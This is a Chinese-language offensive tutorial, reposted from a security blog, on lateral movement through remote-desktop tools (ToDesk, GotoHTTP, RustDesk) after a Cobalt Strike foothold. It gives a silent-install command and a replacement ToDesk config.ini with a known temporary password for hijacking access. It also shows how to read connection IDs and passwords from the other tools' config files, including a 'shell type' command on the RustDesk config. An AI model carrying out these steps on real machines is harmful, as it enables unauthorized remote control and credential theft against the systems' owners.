利用远控工具进行横向移动

adopi

利用远控工具进行横向移动
0x00   Todesk横向移动

    Todesk在安装目录下会生成一个config.ini配置文件，存储的有设备代码、临时密码、安全密码以及登录用户和密码等重要敏感信息，但密码都经过Todesk特有的加密算法加密，所以不能通过解密得到明文密码，只需要去替换这个配置文件，然后重启服务即可。

利用过程

如果目标机器未安装Todesk,可以将安装包上传至目标机器然后静默安装即可

todesk.exe /S

1、CS上线一台机器后发现存在Todesk进程


2、找到Todesk的安装目录，替换为如下config.ini

1. // 临时密码为 063805
   
2. [ConfigInfo]
   
3. screen_img=
   
4. PrivateScreenLockScreen=1
   
5. autoLockScreen=1
   
6. language=936
   
7. Version=4.3.2.1
   
8. clientId=307085976
   
9. tempAuthPassEx=08f4314e069b5fd018daf1ce7fcba51d88e3fa3c97a396aa9157492455e28bb489142e39df3b5f6c2cb4782d1b7ecfb602f4b80a146c
   
10. updatePassTime=20220811
    
11. Resolution=2025x1363
    
12. TestHWCodecTime=20220811

复制代码

3、杀掉Todesk相关进程


4、重启Todesk



5、重启之后，查看config.ini配置



查看后发现clientId值并没有发现变化，但是tempAuthPassEx已经变成了我们替换后的临时密码

6、然后使用Todesk就可以直接远程连接这台机器了


0x01  GoToHTTP横向移动

    GotoHTTP工作在B2C模式。使用远程控制时，您不必在每一台电脑上都安装远程软件。不管身处何处，有浏览器就能访问远程电脑。即使公司网络管控，仍然可以控制或被控制。支持文件传输、无人值守、剪切板同步、远程语 音、远程摄像头、多显示器支持。

利用过程

1、将文件上传到目标机器



2、运行程序



3、在程序的安装目录下查看配置文件里面有连接地址和账号密码



4、访问配置文件中的地址，输入远程电脑ID及控制码即可




0x02  RustDesk横向移动

    开箱即用，普通权限即可运行，而且支持纯内网环境。

利用过程

1、将文件上传到目标机器



2、运行



运行之后目标机器会弹出如下窗口，这个不用管，我们直接去找配置文件



3、查看配置文件，得到id和password

shell type C:\Users\Administrator\AppData\Roaming\RustDesk\config\RustDesk.toml


4、成功连接

文章转自 安全攻防屋
侵权请联系删除